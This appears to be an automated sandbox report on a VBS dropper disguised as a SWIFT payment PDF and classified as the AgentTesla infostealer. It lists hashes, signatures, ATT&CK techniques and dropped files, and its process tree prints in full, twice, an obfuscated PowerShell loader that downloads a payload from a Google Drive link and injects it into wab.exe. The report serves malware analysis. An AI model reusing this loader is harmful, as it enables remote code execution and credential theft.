Analysis

  • max time kernel
    145s
  • max time network
    140s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    30-04-2024 01:36

General

  • Target

    SWIFT Copy000224042024-pdf.vbs

  • Size

    34KB

  • MD5

    ec0b0c5aca480e26979b6d7dda8cbb14

  • SHA1

    a98b3addf15724c049e1f2e44a071df9e7b0df21

  • SHA256

    d5271109119ab792f4d1adfa7e24979a19fed1b0d13092b78db4114e3e943170

  • SHA512

    b1deee49cd2f74b0c1c651414181e563dcdbd8658573380dc1dc419b5b8962df6f0105387eb0718087b4ac6efcc963fba3ca253c82cef10be4f07a38d986b713

  • SSDEEP

    384:3E/p5dFHavtyX+hCajcYRn9LH/Y7Yzlgv9gufiQSKBq42:U/pRL+hDjcswPv9gyRSKBq42

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Detect packed .NET executables. Mostly AgentTeslaV4. 2 IoCs
  • Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 2 IoCs
  • Detects binaries and memory artifacts referencing sandbox DLLs typically observed in sandbox evasion 2 IoCs
  • Detects executables referencing Windows vault credential objects. Observed in infostealers 2 IoCs
  • Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers 2 IoCs
  • Detects executables referencing many email and collaboration clients. Observed in information stealers 2 IoCs
  • Detects executables referencing many file transfer clients. Observed in information stealers 2 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SWIFT Copy000224042024-pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2924
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Smid = 1;$Skoningen='S';$Skoningen+='ubstrin';$Skoningen+='g';Function Unarmorial($Neglectful){$Shia=$Neglectful.Length-$Smid;For($Expt124=5; $Expt124 -lt $Shia; $Expt124+=(6)){$Klebrns85+=$Neglectful.$Skoningen.Invoke( $Expt124, $Smid);}$Klebrns85;}function Microthermic($Photomicrogrammes){. ($Nontragic) ($Photomicrogrammes);}$Strikkeri=Unarmorial 'OverbM Ult obystrzU,dstiuddanl.onfel.uffuaPree./Sla e5 Soci.I dsi0Sa.aa Grank(Erst,WGaiasiMisc,n Dds.d Vej oBemadwPist.s.tami QuercNLsepuTA,skr Suble1D ask0bov.n.Oleoy0Acrid;Beton FllesWLit.iiAthlenCeyss6Incon4ddsaa;Miskn VolpexEib i6Multi4Crumb; lex sp.nrPrespvSubli:taget1 diog2 Ka,e1.anta.secon0wabbl)Swoos Rus,GfasereFolkecukasekbehano hvir/Polyt2Brug.0Genfd1Clock0Tioud0Unpar1Diad,0Inter1Rejse SweepFAdvari D.abrIntraeAppref kuldoendosxScrup/Bulbo1 Brod2 Dolc1Tiltm.Pdof 0gran ';$Hypertension=Unarmorial 'SpingUGulphs antieIronir Drys-Bid,eAIsbjegScaleecountn ChantMilch ';$Skrubberier=Unarmorial ' Afgih WalltAbdomt emifpStrafsAnfre:Paede/Coofs/Tids d Et,nr ruteiOverwvHnd.seTo,lh.AmoungAloysoSy,veo ProsgA deflReap,e,oold. SaddcForhaoMedtnmSocia/BrugeuChiroc Omsa?ImpereTagkaxSmykkpLatvio Super empitSerpi=FjerndNaisso.anddwKursvnBiogrlBac aoMa,moaRevandOcto.&FasanichipmdShi t=Rikki1Disci8unaptN Pleji BasooP.litHAnaloT PapibSe,enDSkovmXD.gte0PasswGConchJPaiocRJampay LegedTrigoiFelinNBru eu Kirk6SwatrDUnsusd OmbisNadirR DegecProgrqM.ddeb Sp,gjCornb6 Ga rwBerapJ ko,vtVeder0Be.kf ';$Fiskeriministeren152=Unarmorial 'Gaul.> Sytj ';$Nontragic=Unarmorial 'In skiVeltae misdxS ant ';$Southwester='Kalds';Microthermic (Unarmorial 'efterS IndueUdra tbarti-SlogaCPocksoUdrydnAngletErro eBenevnIrrestChass S apm- CanoP.ockeaSpotlt Fo ehAcidi SkovfTOddfe:deleg\GlgniOStrukfGlggeeSt.atlBlostiis,afa K,ro. U vatContax LogitMiljb Sve,s-SkrivVdk.inaFlaadl TvrduCanale Avne Misea$S oppSEmpo.oRedanu.licktTuli.hNon,cwUn.ereT.iums rojkt.eroeeFolker Til ;Verbo ');Microthermic (Unarmorial 'BilleiPichif flu ,kor(.uckstUnr meHeuchsskatttveget-CoronpFortra GitttBiorhhR.gns MarkaTFestl:Recip\ S umOSlsetf AnskeTimidlSolskiKildeaponde.AnophtLseprxReplatwarmn)La.ia{Facsie PartxSamfuiH rrotScien}sunna;Advar ');$Nationaliteternes = Unarmorial 'TruceeSirbucbrig.h PreioTromb Pol t% Un,kaKarakp osttpStorkdLavsta GlortDeboraFrevl% Fejl\Tell,r isaneSkyrefBrilluAla.ml Hel,gKnsceeS.utk.FrekvBVolkso CricdI ent Opopo&Lynkr& hin Badese dvokcHomoph Vkk o Par Ka.to$O.cur ';Microthermic (Unarmorial 'blksp$DetergAfganlinsu,oFang,bInsu,a Sy,olTurb.:GemmeA Nonog EburgEmpirrTranseLy ozg ExpuaFordjtJaloueKa.orn MulieLascis De usSvire=Looka(Essinc Sl,gmEfte dg,ard Kapre/PersocVal,f Tral.$,rossNTiltvaMikrot ritmiPoudro ontin juveaKon,elMu,chiFree.tvitaleProp,t Subfe,arinrOverhn.afeeeTent,s Aft,)Sene, ');Microthermic (Unarmorial 'Sub.i$Hj pngRokkelHyperoPromebNonc aadiphlBager: FirsTPrem.rCohncy,ompakMos,ubFo valInteng Reore tradr OpmusAflsn1Kamfe1 Unde3 rov=Viceb$ MidsSJeremk BlodrReperu IdrtbUdmajb UdfleSkuddrDrai,ieftereB,tsorStack. EntesNonrepdefe.lAz.toiMell,tWatti(Manu,$ JordFG,resil oplsKlvelkQuareeLi.ssrO.tuniUf.rsmTop,oiRea.inOlympiv,ndlsZapa,tTr.kweslhu rFormue Bl.pn Teks1 Besg5Konst2Depla)Gy,os ');$Skrubberier=$Trykblgers113[0];Microthermic (Unarmorial 'Comel$SynskgA,diclSk mfoPetkibUnderaaffoll Cole:SkifeE h,lppFors,oFeatos S,ncsMnstee,aglsr PrstnS lereTab,lsBr kk=For.eNAssoce .nwowCo,te-Def.nOServibBoss.j.nconeKujoncThatctAnter Min fSUnglayKopulsAmssnt Cystetr nsmIsole.N.ghtNDrueseGeosttSa.sa.Op osW Ti,feSla,ibSaldoCWrongl,getsiEddaeeUdt nnA.tietGyrou ');Microthermic (Unarmorial 'Sands$deregE SystpCo,groHjkoms KagesPl.mmeg nlor Ge anBo tdePsychsramsh. TilrHCoeloeFastgamas,adadlumeSubedr KapisDisqu[.nsam$FarseHArcheyPsychpTwaese G acrMe.amtPogroePsychnLedi,sSpireiNskesoM,ridnp.osc].nobu=Brevs$OpecdS Meact,rnker Rhini RubakMy hok FlokeDumdrr sargiSvben ');$Pryglet=Unarmorial ' Dag.Enondeps,rucoSandbsSyn rsOpalieBasbarBach.nColibeBearns None.CohabD averoUde.lwPostbnStrailStumpoNonetaBohe.dHonorFbeslai Gra.l.xemeeBurre(Reakt$Disp.SM.rgekM nxirRoqueuTrskrbDe egbChic eNaj,dr jathi oltieBal,orslett,L.erb$GeomotpockerA gosiPentrgAffrou Ort.ySlibn)W.irr ';$Pryglet=$Aggregateness[1]+$Pryglet;$triguy=$Aggregateness[0];Microthermic (Unarmorial 'Splej$Inobsg di elTutt,oFilerbSpejdaHailslUnfol:BrnegS Pus aThor.m Afspm omateBrne,n archl.onpeiBrusegSympanGasmaiBjergn Sl tg Ptersoverwg.umanrfriafuVaccinSol qdUdkikl sk,la wimmgJagtheRec.lnOutche Sto.=Trons(linieT pseueLsrefsPhylltUnper-StudeP UdloaHygeitUnblehWhips Immat$Ulykkt.olycr,atali StnkgBehinuUbeskyDy sv)Spgef ');while (!$Sammenligningsgrundlagene) {Microthermic (Unarmorial 'Gamac$Pa.skgAftenl Mi eou,magbSpif a DebalTr.gi:LovhjEDistrxtilt,aTvaermFang,i rain.ygniaUnconbRedvei,heodl BrndiUnivetHe rkyBlufr1Bjffe3Che.k3 anni= in a$ Coadt For rHete uStre.e Kvik ') ;Microthermic $Pryglet;Microthermic (Unarmorial 'GloruSKol etAfmela IndirgammetFik e-E.atsSFiss,lregnfeN ddmeCard,p ooth Spie,4judai ');Microthermic (Unarmorial ' Reva$Dek.mgI,ustlCisteoS,artbRod ka tenclblreh:SkoleS esmeaSlgtsmUnbehmKagese scutnGeopolStab,iSolubgVisnenKendsi virunStintgBimets PlovgProcrr,astouP.lebn ic bdForr.lTermia epoygStyr,eLoaminIntooeInsan=Bespr(druryT lideAmbits DekltPosty-BevisPDir.caCitywtFrisoh Berr Repo$PityitK,adsr,opvii ndig Spgeu ,atayUnhal) Over ') ;Microthermic (Unarmorial 'Schlo$Ensa,g RecolarteroDidynbLinieac,skdlLiqui: varpSAirpaaIllumb,heidlJustee GivenBistesTerra=Aerin$waldegPanc,lP.rgaoS,ttebSammeaStikkl Purp:SkittI.inicn Con c ,emiaCounsnSassatSkedea HalvtsanikoVagt,rM.edeyJakke+Accur+ Wr t%Revea$UoverTDistirstympy Fan kDullsbcradllFoedegSalmieWineyr A.lisUdtmm1kusse1 Adm 3Pyrrh. F.recLysbaoToaaru Yamsnpseudt ides ') ;$Skrubberier=$Trykblgers113[$Sablens];}Microthermic (Unarmorial 'An,ia$B,oclgGrnselFl atoSurgebstik.aba solPseud:G.ldeTGudbeeGotisaIndebkRetsftPrerorAnisesforudsSkattkDefina moonbRere ,utra= Nonf SygejGPushoeGlde tO.igi-LufteCProtooVer.unEkspatTrilleDagpenStrigt Ford ,kov$ Eu,tt dkorunipoiSkftngEmi auSpindyHigh. ');Microthermic (Unarmorial ',igpt$Masseg.upplltvineoEndekbOverpau amol.ocke: yliPConrioNubrentrip.tNo,nui CellfT,afiiEmpatc Bevga.rrevl F.rbiN nmobPoleruArgufsDvrga Dyrkn= stra Teto[ ,ninSManv yParlysBulkstRegule SubgmSchot.afkryC Outso hurtnIndsnv Lb,telobbyr G.antS dom],rkle: grun:krediFM llerp.intoTorntm Ge.bBSiliraForess.otteeSteno6 Tyfu4LutreS.undetMobilrStramiSprngn Alg,gPrete(Storm$entreTMglineCom oaSpermkSkalot ebrdrenheds ,ecosInedukOpklaa Et,bb,ffal) Moun ');Microthermic (Unarmorial 'Forky$Diamog Kr,olHjertoLaterbPalt.a .ggilSubtr:Drou,L MareuUnderdStyrtiGaspecDeparrNoncooJanics.autoiOmhegtSauroyFod.o Belie=Unive Op ar[UnflaSPhellyHjlpes jertfro.teTordimSr,ov.Sem.eTH.ddieStudexSofactSella.souteEParalnCulv cOphjeoMicrodLoudsiNonsyn agblgTrach]Atrer: Armf:Sca.pASkr.eSMowerCM.dleISejesIRa,ke.Burl,GHomoleSlumktbud tSBuildtFribarHomo iA ternTribeg Insc( hyli$ LevePCocruolignin .kratFj,rniAnte fFlagsiEcto.cUpsolaIfrellU meriIriscbEkspluRugbrsLaane)Hou,e ');Microthermic (Unarmorial 'Kav.a$OversgMentilSchiloUda,bb DelaaEmpirl Like:Afst,BBelooePrin,n DagdeYn lin .rakeMiddesAnore=,alci$AutomL.ortouAma,rdFugleilngslcGerm,rconsooGavlts Ka ti peritD ugmyOptim.Slutns R keuKranibDeregs Plent Error Ans iWalkin,dflugTechn(Inspo3Balan1Garra1Angiv6Unapt1Blgef2Caloy,Forst2 Kove7D.riv8Synkr7Basta0 ,yat) Syno ');Microthermic $Benenes;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2612
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\refulge.Bod && echo $"
        3⤵
          PID:2508
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Smid = 1;$Skoningen='S';$Skoningen+='ubstrin';$Skoningen+='g';Function Unarmorial($Neglectful){$Shia=$Neglectful.Length-$Smid;For($Expt124=5; $Expt124 -lt $Shia; $Expt124+=(6)){$Klebrns85+=$Neglectful.$Skoningen.Invoke( $Expt124, $Smid);}$Klebrns85;}function Microthermic($Photomicrogrammes){. ($Nontragic) ($Photomicrogrammes);}$Strikkeri=Unarmorial 'OverbM Ult obystrzU,dstiuddanl.onfel.uffuaPree./Sla e5 Soci.I dsi0Sa.aa Grank(Erst,WGaiasiMisc,n Dds.d Vej oBemadwPist.s.tami QuercNLsepuTA,skr Suble1D ask0bov.n.Oleoy0Acrid;Beton FllesWLit.iiAthlenCeyss6Incon4ddsaa;Miskn VolpexEib i6Multi4Crumb; lex sp.nrPrespvSubli:taget1 diog2 Ka,e1.anta.secon0wabbl)Swoos Rus,GfasereFolkecukasekbehano hvir/Polyt2Brug.0Genfd1Clock0Tioud0Unpar1Diad,0Inter1Rejse SweepFAdvari D.abrIntraeAppref kuldoendosxScrup/Bulbo1 Brod2 Dolc1Tiltm.Pdof 0gran ';$Hypertension=Unarmorial 'SpingUGulphs antieIronir Drys-Bid,eAIsbjegScaleecountn ChantMilch ';$Skrubberier=Unarmorial ' Afgih WalltAbdomt emifpStrafsAnfre:Paede/Coofs/Tids d Et,nr ruteiOverwvHnd.seTo,lh.AmoungAloysoSy,veo ProsgA deflReap,e,oold. SaddcForhaoMedtnmSocia/BrugeuChiroc Omsa?ImpereTagkaxSmykkpLatvio Super empitSerpi=FjerndNaisso.anddwKursvnBiogrlBac aoMa,moaRevandOcto.&FasanichipmdShi t=Rikki1Disci8unaptN Pleji BasooP.litHAnaloT PapibSe,enDSkovmXD.gte0PasswGConchJPaiocRJampay LegedTrigoiFelinNBru eu Kirk6SwatrDUnsusd OmbisNadirR DegecProgrqM.ddeb Sp,gjCornb6 Ga rwBerapJ ko,vtVeder0Be.kf ';$Fiskeriministeren152=Unarmorial 'Gaul.> Sytj ';$Nontragic=Unarmorial 'In skiVeltae misdxS ant ';$Southwester='Kalds';Microthermic (Unarmorial 'efterS IndueUdra tbarti-SlogaCPocksoUdrydnAngletErro eBenevnIrrestChass S apm- CanoP.ockeaSpotlt Fo ehAcidi SkovfTOddfe:deleg\GlgniOStrukfGlggeeSt.atlBlostiis,afa K,ro. U vatContax LogitMiljb Sve,s-SkrivVdk.inaFlaadl TvrduCanale Avne Misea$S oppSEmpo.oRedanu.licktTuli.hNon,cwUn.ereT.iums rojkt.eroeeFolker Til ;Verbo ');Microthermic (Unarmorial 'BilleiPichif flu ,kor(.uckstUnr meHeuchsskatttveget-CoronpFortra GitttBiorhhR.gns MarkaTFestl:Recip\ S umOSlsetf AnskeTimidlSolskiKildeaponde.AnophtLseprxReplatwarmn)La.ia{Facsie PartxSamfuiH rrotScien}sunna;Advar ');$Nationaliteternes = Unarmorial 'TruceeSirbucbrig.h PreioTromb Pol t% Un,kaKarakp osttpStorkdLavsta GlortDeboraFrevl% Fejl\Tell,r isaneSkyrefBrilluAla.ml Hel,gKnsceeS.utk.FrekvBVolkso CricdI ent Opopo&Lynkr& hin Badese dvokcHomoph Vkk o Par Ka.to$O.cur ';Microthermic (Unarmorial 'blksp$DetergAfganlinsu,oFang,bInsu,a Sy,olTurb.:GemmeA Nonog EburgEmpirrTranseLy ozg ExpuaFordjtJaloueKa.orn MulieLascis De usSvire=Looka(Essinc Sl,gmEfte dg,ard Kapre/PersocVal,f Tral.$,rossNTiltvaMikrot ritmiPoudro ontin juveaKon,elMu,chiFree.tvitaleProp,t Subfe,arinrOverhn.afeeeTent,s Aft,)Sene, ');Microthermic (Unarmorial 'Sub.i$Hj pngRokkelHyperoPromebNonc aadiphlBager: FirsTPrem.rCohncy,ompakMos,ubFo valInteng Reore tradr OpmusAflsn1Kamfe1 Unde3 rov=Viceb$ MidsSJeremk BlodrReperu IdrtbUdmajb UdfleSkuddrDrai,ieftereB,tsorStack. EntesNonrepdefe.lAz.toiMell,tWatti(Manu,$ JordFG,resil oplsKlvelkQuareeLi.ssrO.tuniUf.rsmTop,oiRea.inOlympiv,ndlsZapa,tTr.kweslhu rFormue Bl.pn Teks1 Besg5Konst2Depla)Gy,os ');$Skrubberier=$Trykblgers113[0];Microthermic (Unarmorial 'Comel$SynskgA,diclSk mfoPetkibUnderaaffoll Cole:SkifeE h,lppFors,oFeatos S,ncsMnstee,aglsr PrstnS lereTab,lsBr kk=For.eNAssoce .nwowCo,te-Def.nOServibBoss.j.nconeKujoncThatctAnter Min fSUnglayKopulsAmssnt Cystetr nsmIsole.N.ghtNDrueseGeosttSa.sa.Op osW Ti,feSla,ibSaldoCWrongl,getsiEddaeeUdt nnA.tietGyrou ');Microthermic (Unarmorial 'Sands$deregE SystpCo,groHjkoms KagesPl.mmeg nlor Ge anBo tdePsychsramsh. TilrHCoeloeFastgamas,adadlumeSubedr KapisDisqu[.nsam$FarseHArcheyPsychpTwaese G acrMe.amtPogroePsychnLedi,sSpireiNskesoM,ridnp.osc].nobu=Brevs$OpecdS Meact,rnker Rhini RubakMy hok FlokeDumdrr sargiSvben ');$Pryglet=Unarmorial ' Dag.Enondeps,rucoSandbsSyn rsOpalieBasbarBach.nColibeBearns None.CohabD averoUde.lwPostbnStrailStumpoNonetaBohe.dHonorFbeslai Gra.l.xemeeBurre(Reakt$Disp.SM.rgekM nxirRoqueuTrskrbDe egbChic eNaj,dr jathi oltieBal,orslett,L.erb$GeomotpockerA gosiPentrgAffrou Ort.ySlibn)W.irr ';$Pryglet=$Aggregateness[1]+$Pryglet;$triguy=$Aggregateness[0];Microthermic (Unarmorial 'Splej$Inobsg di elTutt,oFilerbSpejdaHailslUnfol:BrnegS Pus aThor.m Afspm omateBrne,n archl.onpeiBrusegSympanGasmaiBjergn Sl tg Ptersoverwg.umanrfriafuVaccinSol qdUdkikl sk,la wimmgJagtheRec.lnOutche Sto.=Trons(linieT pseueLsrefsPhylltUnper-StudeP UdloaHygeitUnblehWhips Immat$Ulykkt.olycr,atali StnkgBehinuUbeskyDy sv)Spgef ');while (!$Sammenligningsgrundlagene) {Microthermic (Unarmorial 'Gamac$Pa.skgAftenl Mi eou,magbSpif a DebalTr.gi:LovhjEDistrxtilt,aTvaermFang,i rain.ygniaUnconbRedvei,heodl BrndiUnivetHe rkyBlufr1Bjffe3Che.k3 anni= in a$ Coadt For rHete uStre.e Kvik ') ;Microthermic $Pryglet;Microthermic (Unarmorial 'GloruSKol etAfmela IndirgammetFik e-E.atsSFiss,lregnfeN ddmeCard,p ooth Spie,4judai ');Microthermic (Unarmorial ' Reva$Dek.mgI,ustlCisteoS,artbRod ka tenclblreh:SkoleS esmeaSlgtsmUnbehmKagese scutnGeopolStab,iSolubgVisnenKendsi virunStintgBimets PlovgProcrr,astouP.lebn ic bdForr.lTermia epoygStyr,eLoaminIntooeInsan=Bespr(druryT lideAmbits DekltPosty-BevisPDir.caCitywtFrisoh Berr Repo$PityitK,adsr,opvii ndig Spgeu ,atayUnhal) Over ') ;Microthermic (Unarmorial 'Schlo$Ensa,g RecolarteroDidynbLinieac,skdlLiqui: varpSAirpaaIllumb,heidlJustee GivenBistesTerra=Aerin$waldegPanc,lP.rgaoS,ttebSammeaStikkl Purp:SkittI.inicn Con c ,emiaCounsnSassatSkedea HalvtsanikoVagt,rM.edeyJakke+Accur+ Wr t%Revea$UoverTDistirstympy Fan kDullsbcradllFoedegSalmieWineyr A.lisUdtmm1kusse1 Adm 3Pyrrh. F.recLysbaoToaaru Yamsnpseudt ides ') ;$Skrubberier=$Trykblgers113[$Sablens];}Microthermic (Unarmorial 'An,ia$B,oclgGrnselFl atoSurgebstik.aba solPseud:G.ldeTGudbeeGotisaIndebkRetsftPrerorAnisesforudsSkattkDefina moonbRere ,utra= Nonf SygejGPushoeGlde tO.igi-LufteCProtooVer.unEkspatTrilleDagpenStrigt Ford ,kov$ Eu,tt dkorunipoiSkftngEmi auSpindyHigh. ');Microthermic (Unarmorial ',igpt$Masseg.upplltvineoEndekbOverpau amol.ocke: yliPConrioNubrentrip.tNo,nui CellfT,afiiEmpatc Bevga.rrevl F.rbiN nmobPoleruArgufsDvrga Dyrkn= stra Teto[ ,ninSManv yParlysBulkstRegule SubgmSchot.afkryC Outso hurtnIndsnv Lb,telobbyr G.antS dom],rkle: grun:krediFM llerp.intoTorntm Ge.bBSiliraForess.otteeSteno6 Tyfu4LutreS.undetMobilrStramiSprngn Alg,gPrete(Storm$entreTMglineCom oaSpermkSkalot ebrdrenheds ,ecosInedukOpklaa Et,bb,ffal) Moun ');Microthermic (Unarmorial 'Forky$Diamog Kr,olHjertoLaterbPalt.a .ggilSubtr:Drou,L MareuUnderdStyrtiGaspecDeparrNoncooJanics.autoiOmhegtSauroyFod.o Belie=Unive Op ar[UnflaSPhellyHjlpes jertfro.teTordimSr,ov.Sem.eTH.ddieStudexSofactSella.souteEParalnCulv cOphjeoMicrodLoudsiNonsyn agblgTrach]Atrer: Armf:Sca.pASkr.eSMowerCM.dleISejesIRa,ke.Burl,GHomoleSlumktbud tSBuildtFribarHomo iA ternTribeg Insc( hyli$ LevePCocruolignin .kratFj,rniAnte fFlagsiEcto.cUpsolaIfrellU meriIriscbEkspluRugbrsLaane)Hou,e ');Microthermic (Unarmorial 'Kav.a$OversgMentilSchiloUda,bb DelaaEmpirl Like:Afst,BBelooePrin,n DagdeYn lin .rakeMiddesAnore=,alci$AutomL.ortouAma,rdFugleilngslcGerm,rconsooGavlts Ka ti peritD ugmyOptim.Slutns R keuKranibDeregs Plent Error Ans iWalkin,dflugTechn(Inspo3Balan1Garra1Angiv6Unapt1Blgef2Caloy,Forst2 Kove7D.riv8Synkr7Basta0 ,yat) Syno ');Microthermic $Benenes;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2884
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\refulge.Bod && echo $"
            4⤵
              PID:780
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Adds Run key to start application
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2760

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Persistence

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Privilege Escalation

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Defense Evasion

      Modify Registry

      1
      T1112

      Discovery

      System Information Discovery

      1
      T1082

      Command and Control

      Web Service

      1
      T1102

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
        Filesize

        68KB

        MD5

        29f65ba8e88c063813cc50a4ea544e93

        SHA1

        05a7040d5c127e68c25d81cc51271ffb8bef3568

        SHA256

        1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

        SHA512

        e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        344B

        MD5

        2de9088cf1a95a0aaa8fe21df2156c5c

        SHA1

        24da9fc01cdffbda6865f590b54fc54e8efec2e8

        SHA256

        ee8e1f98f264004c1ba99f4283694865c9de8e00fd23aa4d36f20a8f17b94a8d

        SHA512

        a03c271f6635deb53917186b00cfa8884d43910019e1ec656f0bfe2b98946715e05915da9a79871de9285e3ef10b0860cada77c042893bfa81f1dfa5402f1578

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\E8M8QAECJ2NSW5VQYCC9.temp
        Filesize

        7KB

        MD5

        9cd37f3364f055b69b524ce8c8ad8142

        SHA1

        f7b0463d216384f2d1c39f6ca71aa8b09851b596

        SHA256

        7ea3b94c59b2e349c82ab7cd562d4127d74ac80c04b3d4dbc6da701e3a3ee1ac

        SHA512

        5add01628b887c6c92c26eefcbf52ca311324a18231f32f6908c757c22b9a41c7abdc05245cbe2e933df5e161776de40441ebf4f69ab395ab0c0433f38a2df0e

      • C:\Users\Admin\AppData\Roaming\refulge.Bod
        Filesize

        442KB

        MD5

        d46f9ca4ea9e4dd43d582b9f2e38199e

        SHA1

        09f5c2a00e0f709038145b03889e3ab6263824ed

        SHA256

        94dc661c05f18accf414194688b8950a9e0180df256227f30acf4c606a923d6e

        SHA512

        7cd257aa22802931aa5b9c6adee5a6430fb587da25da24e2756b0aa50af9b47f478e19705b117dc2d6032c410565a027c4545b12aedb403e3ff389567087681b

      • memory/2612-25-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp
        Filesize

        9.6MB

      • memory/2612-35-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp
        Filesize

        9.6MB

      • memory/2612-28-0x0000000002E40000-0x0000000002EC0000-memory.dmp
        Filesize

        512KB

      • memory/2612-27-0x0000000002E40000-0x0000000002EC0000-memory.dmp
        Filesize

        512KB

      • memory/2612-26-0x0000000002E40000-0x0000000002EC0000-memory.dmp
        Filesize

        512KB

      • memory/2612-23-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp
        Filesize

        9.6MB

      • memory/2612-64-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp
        Filesize

        9.6MB

      • memory/2612-21-0x000000001B750000-0x000000001BA32000-memory.dmp
        Filesize

        2.9MB

      • memory/2612-37-0x0000000002E40000-0x0000000002EC0000-memory.dmp
        Filesize

        512KB

      • memory/2612-36-0x0000000002E40000-0x0000000002EC0000-memory.dmp
        Filesize

        512KB

      • memory/2612-38-0x0000000002E40000-0x0000000002EC0000-memory.dmp
        Filesize

        512KB

      • memory/2612-24-0x0000000002E40000-0x0000000002EC0000-memory.dmp
        Filesize

        512KB

      • memory/2612-22-0x0000000001D80000-0x0000000001D88000-memory.dmp
        Filesize

        32KB

      • memory/2760-63-0x0000000000540000-0x00000000015A2000-memory.dmp
        Filesize

        16.4MB

      • memory/2760-65-0x0000000000540000-0x0000000000582000-memory.dmp
        Filesize

        264KB

      • memory/2884-34-0x0000000006730000-0x0000000007768000-memory.dmp
        Filesize

        16.2MB